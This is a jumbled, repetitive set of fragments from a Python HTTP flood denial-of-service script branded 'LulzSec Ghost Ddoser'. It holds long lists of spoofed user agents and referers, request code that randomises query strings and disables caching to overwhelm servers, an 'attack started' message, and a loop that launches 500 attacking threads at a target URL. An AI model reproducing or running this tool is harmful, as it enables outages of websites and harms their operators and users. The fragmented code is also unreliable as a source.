"Firefox/18.0') headers_useragents.append(' Mozilla/5.0 (Linux; Android 4.2.1; Nexus 4 Build/JOP40D) AppleWebKit/535.19 (KHTML, like Gecko)')", "4.1.1; Nexus 7 Build/JRO03D)') headers_useragents.append('AppleWebKit/535.19 (KHTML, like Gecko)') headers_useragents.append('Chrome/18.0.1025.166 Safari/535.19') headers_useragents.append('Mozilla/5.0 (Linux; U;", "robots meta tags ; http://balihoo.com/index.aspx; robot at balihoo dot com)') headers_useragents.append('BanBots/1.2 (<EMAIL>)') headers_useragents.append('Barca/2.0.xxxx')", "headers_useragents.append('Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36') headers_useragents.append('Mozilla/5.0 (Windows", "headers_useragents.append('Mozilla/5.0 (X11; Linux x86_64)') headers_useragents.append('Mozilla/5.0 (Linux; Android 4.1.1;') headers_useragents.append('Mozilla/5.0 (Linux; U; Android 4.0.4;", ": : / ( ;|;-./_ _/.-:'o | / ' | / , \\._/_/_./--''/_|:|___|_,'", "headers_useragents.append('appie 1.1 (www.walhello.com)') 
headers_useragents.append('Apple iPhone v1.1.4 CoreMedia v1.0.0.4A102') headers_useragents.append('Apple-PubSub/65.1.1') headers_useragents.append('ArabyBot (compatible; Mozilla/5.0; GoogleBot;", "AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36') headers_useragents.append('Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML,", "Proxy/1.0)') headers_useragents.append('DoCoMo/2.0 SH901iC(c100;TB;W24H12)') headers_useragents.append('DoCoMo/1.0/N503is/c10') headers_useragents.append('KDDI-KC31 UP.Browser/6.2.0.5 (GUI)') headers_useragents.append('MMP/2.0') headers_useragents.append('UP.Browser/3.04-TS14 UP.Link/3.4.4') headers_useragents.append('Vodafone/1.0/V802SE/SEJ001 Browser/SEMC-Browser/4.1') headers_useragents.append('J-PHONE/5.0/V801SA/SN123456789012345", "headers_useragents.append('AbachoBOT (Mozilla compatible)') headers_useragents.append('ABCdatos BotLink/5.xx.xxx#BBL') headers_useragents.append('Aberja Checkomat Aberja Hybridsuchmaschine (Germany)') headers_useragents.append('abot/0.1 (abot; http://www.abot.com;", "(Linux; U; Android 4.1.2; en-gb; GT-I9300 Build/JZO54K)') headers_useragents.append('AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile", "/ / / / ~ ~~ ~~~ ~~~ ~~~ ~~~ \"\"\" #http request", "AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36') headers_useragents.append('Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML,", "Good Day)') headers_useragents.append('-DIE-KRAEHE- META-SEARCH-ENGINE/1.1 http://www.die-kraehe.de') headers_useragents.append('123spider-Bot (Version: 1.02) powered by www.123spider.de') headers_useragents.append('192.comAgent') headers_useragents.append('1st", "`' ,' `. / |`-:_ ; | | | : \\ `--. 
)", "' | / , \\._/_/_./--''/_|:|___|_,' | : / `'-'--'----'---------' | | : O", "CE; PPC; 240x320)') headers_useragents.append('Mozilla/2.0 (compatible; MSIE 3.02;') headers_useragents.append('Windows CE; PPC; 240x320)') headers_useragents.append('Mozilla/5.0 (X11;", "headers_useragents.append(' Mozilla/5.0 (compatible; AvantGo 3.2;') headers_useragents.append('ProxiNet; Danger hiptop 1.0)') headers_useragents.append('DoCoMo/1.0/P502i/c10 (Google CHTML Proxy/1.0)')", "isara dot org)') headers_useragents.append('ActiveBookmark 1.x') headers_useragents.append('Activeworlds') headers_useragents.append('ActiveWorlds/3.xx (xxx)') headers_useragents.append('Ad Muncher v4.xx.x') headers_useragents.append('Ad Muncher", "\\ \\ / / :_| ;`-._; __..--'; : : / ( ;|;-./_ _/.-:'o", "headers_useragents.append('Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36') headers_useragents.append('Mozilla/5.0", "Ice Bucket Challenge') keyword_top.append('Flappy Bird') keyword_top.append('Conchita Wurst') keyword_top.append('ISIS') keyword_top.append('Frozen') keyword_top.append('014 Sochi Winter Olympics')", "(.NET CLR 3.5.30729)') headers_useragents.append('Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3", ": / `'-'--'----'---------' | | : O ._O O_. O ._O O_. 
;", "GoogleBot; FAST Crawler 6.4; http://www.araby.com;)') headers_useragents.append('ArachBot') headers_useragents.append('Arachnoidea (<EMAIL>)') headers_useragents.append('aranhabot') headers_useragents.append('ArchitextSpider') headers_useragents.append('archive.org_bot') headers_useragents.append('Argus/1.1 (Nutch;", "MSIE 6.1; Windows XP)') headers_useragents.append('Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51') headers_useragents.append('Mozilla/5.0", "NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36') headers_useragents.append('Mozilla/5.0 (Macintosh; Intel Mac OS", "headers_useragents.append('Attentio/Nutch-0.9-dev (Attentios beta blog crawler; www.attentio.com; <EMAIL>)') headers_useragents.append('AU-MIC/2.0 MMP/2.0') headers_useragents.append('AUDIOVOX-SMT5600') headers_useragents.append('augurfind') headers_useragents.append('augurnfind V-1.x')", "Gecko)') headers_useragents.append('Mozilla/5.0 (Linux; Android 4.1.1; Nexus 7 Build/JRO03D)') headers_useragents.append('AppleWebKit/535.19 (KHTML, like Gecko)') headers_useragents.append('Chrome/18.0.1025.166", "libwww/5.4.0') headers_useragents.append('amaya/11.1 libwww/5.4.0') headers_useragents.append('amaya/10.1 libwww/5.4.0') headers_useragents.append('amaya/10 libwww/5.4.0') headers_useragents.append('amaya/9.55 libwww/5.4.0') headers_useragents.append('amaya/9.54 libwww/5.4.0') headers_useragents.append('amaya/9.52 libwww/5.4.0')", "ru-ru; Explay Surfer 7.02 Build/ICS.g12refM703A1HZ1.20121009) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0') headers_useragents.append(' Mozilla/5.0 (Linux;", "keyword_top.append('uber') keyword_top.append('american eagle') keyword_top.append('jessica simpson') keyword_top.append('jacket') keyword_top.append('anderson east') keyword_top.append('kroger') ('http://' + host +", "Gecko/18.0 Firefox/18.0') headers_useragents.append(' Mozilla/5.0 (Linux; Android 4.2.1; Nexus 4 Build/JOP40D) AppleWebKit/535.19 (KHTML, 
like", "OS X 10_6_3; en-us)') headers_useragents.append('AppleWebKit/533.16 (KHTML, like Gecko) Version/5.0 Safari/533.16') headers_useragents.append('Version/4.0 Mobile Safari/533.1')", "array def useragent_list(): global headers_useragents headers_useragents.append('Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3", "5.2; Win64; x64; Trident/4.0)') headers_useragents.append('Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1;", "(http://www.answerbus.com/)') headers_useragents.append('AnswerChase PROve x.0') headers_useragents.append('AnswerChase x.0') headers_useragents.append('ANTFresco/x.xx') headers_useragents.append('antibot-V1.1.5/i586-linux-2.2') headers_useragents.append('AnzwersCrawl/2.0 (<EMAIL>;Engine)') headers_useragents.append('Apexoo Spider 1.x')", "MSIE 6.1; Windows XP)') headers_useragents.append('Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51') headers_useragents.append('(DreamPassport/3.0;", "headers_useragents.append('2Bone_LinkChecker/1.0 libwww-perl/5.64') headers_useragents.append('4anything.com LinkChecker v2.0') headers_useragents.append('8484 Boston Project v 1.0') headers_useragents.append(':robot/1.0 (linux) (", "urllib2.URLError, e: #print e.reason sys.exit() else: inc_counter() urllib2.urlopen(request) return(code) #http caller thread class", "Gecko) Chrome/37.0.2049.0 Safari/537.36') headers_useragents.append('Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0", "CE/1.0.1) NetFront/3.0') headers_useragents.append('Mozilla/4.0 (PDA; SL-C750/1.0,Embedix/Qtopia/1.3.0) NetFront/3.0 Zaurus C750') headers_useragents.append('WM5 PIE') headers_useragents.append('Xiino/1.0.9E [en] (v.", "Robot v1.50.001') headers_useragents.append('Acoon Robot v1.52 (http://www.acoon.de)') headers_useragents.append('Acoon-Robot 4.0.x.[xx] (http://www.acoon.de)') headers_useragents.append('Acoon-Robot v3.xx (http://www.acoon.de and", "( ;|;-./_ _/.-:'o | / ' | / , 
\\._/_/_./--''/_|:|___|_,' | : /", "headers_useragents.append('Mozilla/4.0 (PDA; Windows CE/1.0.1) NetFront/3.0') headers_useragents.append('Mozilla/4.0 (PDA; SL-C750/1.0,Embedix/Qtopia/1.3.0) NetFront/3.0 Zaurus C750') headers_useragents.append('WM5 PIE')", "V.001 (http://www.asaha.com/)') headers_useragents.append('Asahina-Antenna/1.x') headers_useragents.append('Asahina-Antenna/1.x (libhina.pl/x.x ; libtime.pl/x.x)') headers_useragents.append('ask.24x.info') headers_useragents.append('AskAboutOil/0.06-rcp (Nutch; http://www.nutch.org/docs/en/bot.html; nutch-agent@<EMAIL>)') headers_useragents.append('asked/Nutch-0.8", "Browser (http://www.avantbrowser.com)') headers_useragents.append('AESOP_com_SpiderMan') headers_useragents.append('Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3 (KHTML, like", "(aipbot dev; http://aipbot.com; <EMAIL>)') headers_useragents.append('Akregator/1.2.9; librss/remnants') headers_useragents.append('Aladin/3.324') headers_useragents.append('Alcatel-BG3/1.0 UP.Browser/5.0.3.1.2') headers_useragents.append('Aleksika Spider/1.0 (+http://www.aleksika.com/)') headers_useragents.append('AlertInfo", "Day)') headers_useragents.append('-DIE-KRAEHE- META-SEARCH-ENGINE/1.1 http://www.die-kraehe.de') headers_useragents.append('Mozilla/5.0 (Linux; U; Android 4.0.3; fr-fr; MIDC41') headers_useragents.append('Build/IML74K) AppleWebKit/534.30", "Fetch 1.0') headers_useragents.append('Avant Browser (http://www.avantbrowser.com)') headers_useragents.append('AVSearch-1.0(<EMAIL>)') headers_useragents.append('AVSearch-2.0-fusionIdx-14-CompetitorWebSites') headers_useragents.append('AVSearch-3.0(AltaVista/AVC)') headers_useragents.append('AWeb') headers_useragents.append('axadine/ (Axadine Crawler; http://www.axada.de/;", "CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)') headers_useragents.append('Mozilla/4.0 (compatible;", "headers_useragents.append('W3C_Validator/1.432.2.10') 
headers_useragents.append('W3C_Validator/1.305.2.12 libwww-perl/5.64') headers_useragents.append('WDG_Validator/1.6.2') headers_useragents.append('amaya/11.3.1 libwww/5.4.1') headers_useragents.append('amaya/11.2 libwww/5.4.0') headers_useragents.append('amaya/11.1 libwww/5.4.0') headers_useragents.append('amaya/10.1 libwww/5.4.0') headers_useragents.append('amaya/10", "headers_useragents.append('Mozilla/5.0 (Linux; U; Android 3.2.1; en-gb; A501 Build/HTK55D)') headers_useragents.append('Opera/9.80 (Android 3.2.1; Linux; Opera')", "1.x') headers_useragents.append('Aplix HTTP/1.0.1') headers_useragents.append('Aplix_SANYO_browser/1.x (Japanese)') headers_useragents.append('Aplix_SEGASATURN_browser/1.x (Japanese)') headers_useragents.append('Aport') headers_useragents.append('appie 1.1 (www.walhello.com)') headers_useragents.append('Apple iPhone", "like Gecko) Chrome/41.0.2226.0 Safari/537.36') headers_useragents.append('Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko)", "U; MSIE 7.0; Windows NT 6.0; en-US)') headers_useragents.append('Mozilla/4.0 (compatible; MSIE 6.1; Windows XP)')", "headers_useragents.append('Asahina-Antenna/1.x') headers_useragents.append('Asahina-Antenna/1.x (libhina.pl/x.x ; libtime.pl/x.x)') headers_useragents.append('ask.24x.info') headers_useragents.append('AskAboutOil/0.06-rcp (Nutch; http://www.nutch.org/docs/en/bot.html; nutch-agent@<EMAIL>)') headers_useragents.append('asked/Nutch-0.8 (web crawler;", "Real artificial intelligence search engine China)') headers_useragents.append('AideRSS/1.0 (aiderss.com)') headers_useragents.append('aipbot/1.0 (aipbot; http://www.aipbot.com; <EMAIL>)') headers_useragents.append('aipbot/2-beta", "v 1.0') headers_useragents.append(':robot/1.0 (linux) ( admin e-mail: undefined http://www.neofonie.de/loesungen/search/robot.html )') headers_useragents.append('A-Online Search') headers_useragents.append('A1", "prmr/Revision:1.1.54 (en)) NetFront/3.0') 
headers_useragents.append('Mozilla/4.0 (PDA; Windows CE/0.9.3) NetFront/3.0') headers_useragents.append('Mozilla/4.0 (PDA; Windows CE/1.0.1) NetFront/3.0')", "headers_useragents.append('Argus/1.1 (Nutch; http://www.simpy.com/bot.html; feedback at simpy dot com)') headers_useragents.append('Arikus_Spider') headers_useragents.append('Arquivo-web-crawler (compatible; heritrix/1.12.1 +http://arquivo-web.fccn.pt)')", "MMP/2.0 Push/PO') headers_useragents.append('UP.Browser/6.1.0.1.140 (Google CHTML Proxy/1.0)') headers_useragents.append('Mozilla/4.0 (compatible; MSIE 5.0; PalmOS) PLink 2.56b')", "headers_useragents.append('(Privoxy/1.0)') headers_useragents.append('*/Nutch-0.9-dev') headers_useragents.append('+SitiDi.net/SitiDiBot/1.0 (+Have Good Day)') headers_useragents.append('-DIE-KRAEHE- META-SEARCH-ENGINE/1.1 http://www.die-kraehe.de') headers_useragents.append('Mozilla/5.0 (Linux; U; Android", "Windows NT 6.1; en; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)') headers_useragents.append('Mozilla/5.0 (Windows; U;", "headers_useragents.append('Mozilla/5.0 (Windows; U; Windows CE 5.1; rv:1.8.1a3) Gecko/20060610') headers_useragents.append('Minimo/0.016') headers_useragents.append('OPWV-SDK UP.Browser/7.0.2.3.119 (GUI) MMP/2.0", "headers_useragents.append('Ad Muncher v4.xx.x') headers_useragents.append('Ad Muncher v4x Build xxxxx') headers_useragents.append('Adaxas Spider (http://www.adaxas.net/)') headers_useragents.append('Advanced Browser", "3.2.1; Linux; Opera') headers_useragents.append('Mozilla/5.0 (Linux; U; Android 3.0.1; en-us; A500 Build/HRI66)') headers_useragents.append('Mozilla/5.0 (X11;", "headers_useragents.append(' Mozilla/5.0 (Linux; Android 4.2.1; Nexus 4 Build/JOP40D) AppleWebKit/535.19 (KHTML, like Gecko)') headers_useragents.append('Mozilla/5.0", "China)') headers_useragents.append('AideRSS/1.0 (aiderss.com)') headers_useragents.append('aipbot/1.0 (aipbot; http://www.aipbot.com; a<EMAIL>)') headers_useragents.append('aipbot/2-beta 
(aipbot dev; http://aipbot.com; a<EMAIL>)') headers_useragents.append('Akregator/1.2.9;", "(compatible; heritrix/1.12.1 +http://arquivo-web.fccn.pt)') headers_useragents.append('ASAHA Search Engine Turkey V.001 (http://www.asaha.com/)') headers_useragents.append('Asahina-Antenna/1.x') headers_useragents.append('Asahina-Antenna/1.x (libhina.pl/x.x ;", "headers_useragents.append('AgentName/0.1 libwww-perl/5.48') headers_useragents.append('AIBOT/2.1 By +(www.21seek.com A Real artificial intelligence search engine China)') headers_useragents.append('AideRSS/1.0", "+(http://www.atlocal.com/local-web-site-owner.html)') headers_useragents.append('Atomic_Email_Hunter/4.0') headers_useragents.append('Atomz/1.0') headers_useragents.append('atSpider/1.0') headers_useragents.append('Attentio/Nutch-0.9-dev (Attentios beta blog crawler; www.attentio.com; <EMAIL>)') headers_useragents.append('AU-MIC/2.0 MMP/2.0')", "N)') headers_useragents.append('itunes/9.0.2 (Macintosh; Intel Mac OS X 10.4.11)') headers_useragents.append('Mozilla/5.0 (Danger hiptop 3.4; U;", "like Gecko)') headers_useragents.append('Chrome/18.0.1025.166 Mobile Safari/535.19') headers_useragents.append('Mozilla/5.0 (Linux; Android 4.1.1; Nexus 7 Build/JRO03D)') headers_useragents.append('AppleWebKit/535.19", "One') keyword_top.append('Apple Watch') keyword_top.append('Nokia X') keyword_top.append('Ipad Air') keyword_top.append('Facebook') keyword_top.append('Anonymous') keyword_top.append('DJ Bach') keyword_top.append('adidas') keyword_top.append('ask.fm')", "MMP/2.0') headers_useragents.append('AUDIOVOX-SMT5600') headers_useragents.append('augurfind') headers_useragents.append('augurnfind V-1.x') headers_useragents.append('autoemailspider') headers_useragents.append('autohttp') headers_useragents.append('autowebdir 1.1 (www.autowebdir.com)') headers_useragents.append('AV Fetch 1.0')", "8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)') headers_useragents.append('Mozilla/4.0 
(compatible;", "NF35WMPRO/1.0; like Gecko) NetFront/3.5') headers_useragents.append('Mozilla/4.08 (Windows; Mobile Content Viewer/1.0) NetFront/3.2') headers_useragents.append('Mozilla/4.0 (PS2; PlayStation", "7 Build/JOP40D) AppleWebKit/535.19 (KHTML, like Gecko)') headers_useragents.append('Chrome/18.0.1025.166 Safari/535.19') headers_useragents.append('Mozilla/5.0 (Android; Mobile; rv:18.0) Gecko/18.0", "v1.50.001') headers_useragents.append('Acoon Robot v1.52 (http://www.acoon.de)') headers_useragents.append('Acoon-Robot 4.0.x.[xx] (http://www.acoon.de)') headers_useragents.append('Acoon-Robot v3.xx (http://www.acoon.de and http://www.acoon.com)')", "LulzSec Ghost\" if len(sys.argv)== 3: if sys.argv[2]==\"safe\": set_safe() url = sys.argv[1] if url.count(\"/\")==2:", "eagle') keyword_top.append('jessica simpson') keyword_top.append('jacket') keyword_top.append('anderson east') keyword_top.append('kroger') ('http://' + host + '/') return(headers_referers)", "/ ' | / , \\._/_/_./--''/_|:|___|_,' | : / `'-'--'----'---------' | | :", "META-SEARCH-ENGINE/1.1 http://www.die-kraehe.de') headers_useragents.append('123spider-Bot (Version: 1.02) powered by www.123spider.de') headers_useragents.append('192.comAgent') headers_useragents.append('1st ZipCommander (Net) -", "headers_useragents.append('Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36') headers_useragents.append('Mozilla/5.0 (Windows", "(Linux; Android 4.1.1; Nexus 7 Build/JRO03D)') headers_useragents.append('AppleWebKit/535.19 (KHTML, like Gecko)') headers_useragents.append('Chrome/18.0.1025.166 Safari/535.19') headers_useragents.append('Mozilla/5.0", "headers_useragents.append('iTunes/9.0.3 (Macintosh; U; Intel Mac OS X 10_6_2; en-ca)') headers_useragents.append('iTunes/9.0.3') headers_useragents.append('iTunes/9.0.2 (Windows; N)')", "http://www.babaloo.si; <EMAIL>)') headers_useragents.append('BaboomBot/1.x.x (+http://www.baboom.us)') 
headers_useragents.append('BackStreet Browser 3.x') headers_useragents.append('BaiduImagespider+(+http://www.baidu.jp/search/s308.html)') headers_useragents.append('BaiDuSpider') headers_useragents.append('Baiduspider+(+http://help.baidu.jp/system/05.html)') headers_useragents.append('Baiduspider+(+http://www.baidu.com/search/spider.htm)') headers_useragents.append('Baiduspider+(+http://www.baidu.com/search/spider_jp.html)') headers_useragents.append('Balihoo/Nutch-1.0-dev", "(+http://www.aleksika.com/)') headers_useragents.append('AlertInfo 2.0 (Powered by Newsbrain)') headers_useragents.append('AlkalineBOT/1.3') headers_useragents.append('AlkalineBOT/1.4 (1.4.0326.0 RTM)') headers_useragents.append('Allesklar/0.1 libwww-perl/5.46') headers_useragents.append('Alligator", "Mobile Safari/535.19') headers_useragents.append('Mozilla/5.0 (Linux; Android 4.1.1; Nexus 7 Build/JRO03D)') headers_useragents.append('AppleWebKit/535.19 (KHTML, like Gecko)')", "e-mail: undefined http://www.neofonie.de/loesungen/search/robot.html )') headers_useragents.append('A-Online Search') headers_useragents.append('A1 Keyword Research/1.0.2 (+http://www.micro-sys.dk/products/keyword-research/) miggibot/2007.03.27') headers_useragents.append('A1 Sitemap", "<EMAIL>') headers_useragents.append('AltaVista Intranet V2.0 Compaq Altavista Eval <EMAIL>') headers_useragents.append('AltaVista Intranet V2.0 evreka.com <EMAIL>')", "headers_useragents.append('AmiTCP Miami (AmigaOS 2.04)') headers_useragents.append('Amoi 8512/R21.0 NF-Browser/3.3') headers_useragents.append('amzn_assoc') headers_useragents.append('AnnoMille spider 0.1 alpha -", "caller thread class HTTPThread(threading.Thread): def run(self): try: while flag<2: code=httpcall(url) if (code==800) &", "X') keyword_top.append('Ipad Air') keyword_top.append('Facebook') keyword_top.append('Anonymous') keyword_top.append('DJ Bach') keyword_top.append('Ecosistema') keyword_top.append('Suicide') keyword_top.append('Sex') 
keyword_top.append('<NAME>') keyword_top.append('World Cup')", "+ '=' + buildblock(random.randint(3,10))) request.add_header('User-Agent', random.choice(headers_useragents)) request.add_header('Cache-Control', 'no-cache') request.add_header('Accept-Charset', 'ISO-8859-1,utf-8;q=0.7,*;q=0.7') request.add_header('Referer', random.choice(headers_referers) +", "return(out_str) def usage(): print 'Pra usar python Lulz.py <url>' print 'LulzSec Ghost Ddoser", "keyword_top.append('Frozen') keyword_top.append('014 Sochi Winter Olympics') keyword_top.append('IPhone') keyword_top.append('Samsung Galaxy S5') keyword_top.append('Nexus 6') keyword_top.append('Moto G')", "Build/FRF91)') headers_useragents.append('App3leWebKit/53.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1') headers_useragents.append('Mozilla/5.0 (Linux; U; Android 4.0.3;", "\\ / / :_| ;`-._; __..--'; : : / ( ;|;-./_ _/.-:'o |", "| | | `| : `' ,' `. / |`-:_ ; | |", "| : \\ `--. ) /|-._: : | \\ \\ / / :_|", "admin e-mail: undefined http://www.neofonie.de/loesungen/search/robot.html )') headers_useragents.append('A-Online Search') headers_useragents.append('A1 Keyword Research/1.0.2 (+http://www.micro-sys.dk/products/keyword-research/) miggibot/2007.03.27') headers_useragents.append('A1", "5.2; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)') headers_useragents.append('Mozilla/5.0 (PlayStation 4 1.52) AppleWebKit/536.26", "http://www.scifihifi.com/cocoalicious)') headers_useragents.append('DomainsDB.net MetaCrawler v.0.9.7c (http://domainsdb.net/)') headers_useragents.append('GSiteCrawler/v1.20 rev. 273 (http://gsitecrawler.com/)') headers_useragents.append('GSiteCrawler/v1.12 rev. 
260 (http://gsitecrawler.com/)')", "Chrome/41.0.2228.0 Safari/537.36') headers_useragents.append('Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko)", "headers_useragents.append('BaiduImagespider+(+http://www.baidu.jp/search/s308.html)') headers_useragents.append('BaiDuSpider') headers_useragents.append('Baiduspider+(+http://help.baidu.jp/system/05.html)') headers_useragents.append('Baiduspider+(+http://www.baidu.com/search/spider.htm)') headers_useragents.append('Baiduspider+(+http://www.baidu.com/search/spider_jp.html)') headers_useragents.append('Balihoo/Nutch-1.0-dev (Crawler for Balihoo.com search engine - obeys", "Build/JRO03E)') headers_useragents.append('AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30') headers_useragents.append('Mozilla/5.0 (Linux; Android 4.2.1; Nexus", "= m.group(1) for i in range(500): t = HTTPThread() t.start() t = MonitorThread()", "search engine China)') headers_useragents.append('AideRSS/1.0 (aiderss.com)') headers_useragents.append('aipbot/1.0 (aipbot; http://www.aipbot.com; a<EMAIL>)') headers_useragents.append('aipbot/2-beta (aipbot dev; http://aipbot.com;", "headers_useragents.append('ASPseek/1.2.9d') headers_useragents.append('ASPSeek/1.2.x') headers_useragents.append('ASPSeek/1.2.xa') headers_useragents.append('ASPseek/1.2.xx') headers_useragents.append('ASPSeek/1.2.xxpre') headers_useragents.append('ASSORT/0.10') headers_useragents.append('asterias/2.0') headers_useragents.append('AtlocalBot/1.1 +(http://www.atlocal.com/local-web-site-owner.html)') headers_useragents.append('Atomic_Email_Hunter/4.0') headers_useragents.append('Atomz/1.0') headers_useragents.append('atSpider/1.0') headers_useragents.append('Attentio/Nutch-0.9-dev", "engine China)') headers_useragents.append('AideRSS/1.0 (aiderss.com)') headers_useragents.append('aipbot/1.0 (aipbot; http://www.aipbot.com; <EMAIL>)') headers_useragents.append('aipbot/2-beta (aipbot dev; http://aipbot.com; <EMAIL>)')", 
"libwww/5.4.0') headers_useragents.append('amaya/11.2 amaya/5.4.0') headers_useragents.append('amaya/11.1 amaya/5.4.0') headers_useragents.append('Cocoal.icio.us/1.0 (v43) (Mac OS X; http://www.scifihifi.com/cocoalicious)') headers_useragents.append('Cocoal.icio.us/1.0 (v40)", "for better indexing on www.axmo.com search engine.') headers_useragents.append('Azureus 2.x.x.x') headers_useragents.append('BabalooSpider/1.3 (BabalooSpider; http://www.babaloo.si; <EMAIL>)')", "headers_useragents.append('Mozilla/4.0 (compatible; MSIE 5.0; PalmOS) PLink 2.56b') headers_useragents.append('Mozilla/5.0 (PDA; NF35WMPRO/1.0; like Gecko) NetFront/3.5')", "headers_useragents.append('Mozilla/5.0 (X11; U; Linux armv6l; rv 1.8.1.5pre) Gecko/20070619') headers_useragents.append('Minimo/0.020') headers_useragents.append('Mozilla/5.0 (Windows; U; Windows", "headers_useragents.append('aipbot/1.0 (aipbot; http://www.aipbot.com; a<EMAIL>)') headers_useragents.append('aipbot/2-beta (aipbot dev; http://aipbot.com; a<EMAIL>)') headers_useragents.append('Akregator/1.2.9; librss/remnants') headers_useragents.append('Aladin/3.324') headers_useragents.append('Alcatel-BG3/1.0", "(BabalooSpider; http://www.babaloo.si; <EMAIL>)') headers_useragents.append('BaboomBot/1.x.x (+http://www.baboom.us)') headers_useragents.append('BackStreet Browser 3.x') headers_useragents.append('BaiduImagespider+(+http://www.baidu.jp/search/s308.html)') headers_useragents.append('BaiDuSpider') headers_useragents.append('Baiduspider+(+http://help.baidu.jp/system/05.html)') headers_useragents.append('Baiduspider+(+http://www.baidu.com/search/spider.htm)') headers_useragents.append('Baiduspider+(+http://www.baidu.com/search/spider_jp.html)')", "headers_useragents.append('Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36') # generates", "referer array def referer_list(): global headers_referers headers_referers.append('http://www.google.com/?q=') 
headers_referers.append('http://www.usatoday.com/search/results?q=') headers_referers.append('http://engadget.search.aol.com/search?q=') headers_referers.append('http://www.google.com/?q=') headers_referers.append('http://www.usatoday.com/search/results?q=') headers_referers.append('http://engadget.search.aol.com/search?q=') headers_referers.append('http://www.bing.com/search?q=')", ";..__..' _... Lulz ,'/ ;|/..--'' \\ Boat ,'_/.-/': : _..-'''/ / | \\", "(www.walhello.com)') headers_useragents.append('Apple iPhone v1.1.4 CoreMedia v1.0.0.4A102') headers_useragents.append('Apple-PubSub/65.1.1') headers_useragents.append('ArabyBot (compatible; Mozilla/5.0; GoogleBot; FAST Crawler", "headers_useragents.append('Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_3; en-us)') headers_useragents.append('AppleWebKit/533.16 (KHTML, like Gecko)", "dot com)') headers_useragents.append('Arikus_Spider') headers_useragents.append('Arquivo-web-crawler (compatible; heritrix/1.12.1 +http://arquivo-web.fccn.pt)') headers_useragents.append('ASAHA Search Engine Turkey V.001 (http://www.asaha.com/)')", "like Gecko)') headers_useragents.append('Chrome/18.0.1025.166 Safari/535.19') headers_useragents.append('Mozilla/5.0 (Android; Mobile; rv:18.0) Gecko/18.0 Firefox/18.0') headers_useragents.append(' Mozilla/5.0 (Linux;", "U; ru) Presto/2.5.22 Version/10.51') headers_useragents.append('(DreamPassport/3.0; isao/MyDiGiRabi)') headers_useragents.append('(Privoxy/1.0)') headers_useragents.append('*/Nutch-0.9-dev') headers_useragents.append('+SitiDi.net/SitiDiBot/1.0 (+Have Good Day)') headers_useragents.append('-DIE-KRAEHE-", "(Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36') headers_useragents.append('Mozilla/5.0", "X; http://www.scifihifi.com/cocoalicious)') headers_useragents.append('Cocoal.icio.us/1.0 (v40) (Mac OS X; http://www.scifihifi.com/cocoalicious)') headers_useragents.append('Cocoal.icio.us/1.0 (v38) (Mac OS X;", "ATTACK 
STARTRD<~~[+] ' code=500 except urllib2.URLError, e: #print e.reason sys.exit() else: inc_counter() urllib2.urlopen(request)", "; libtime.pl/x.x)') headers_useragents.append('ask.24x.info') headers_useragents.append('AskAboutOil/0.06-rcp (Nutch; http://www.nutch.org/docs/en/bot.html; nutch-agent@<EMAIL>)') headers_useragents.append('asked/Nutch-0.8 (web crawler; http://asked.jp; epicurus at", "U; Windows NT 5.2; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)') headers_useragents.append('Mozilla/5.0 (PlayStation", "keyword_top.append('uggs') keyword_top.append('uber') keyword_top.append('american eagle') keyword_top.append('jessica simpson') keyword_top.append('jacket') keyword_top.append('anderson east') keyword_top.append('kroger') ('http://' + host", "_,' |;._:: | | | | `| : `' ,' `. / |`-:_", "+ buildblock(random.randint(3,10))) request.add_header('User-Agent', random.choice(headers_useragents)) request.add_header('Cache-Control', 'no-cache') request.add_header('Accept-Charset', 'ISO-8859-1,utf-8;q=0.7,*;q=0.7') request.add_header('Referer', random.choice(headers_referers) + buildblock(random.randint(5,10))) request.add_header('Keep-Alive',", "CLR 3.0.30729)') headers_useragents.append('Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)') headers_useragents.append('Mozilla/4.0", "headers_useragents.append('Aplix_SANYO_browser/1.x (Japanese)') headers_useragents.append('Aplix_SEGASATURN_browser/1.x 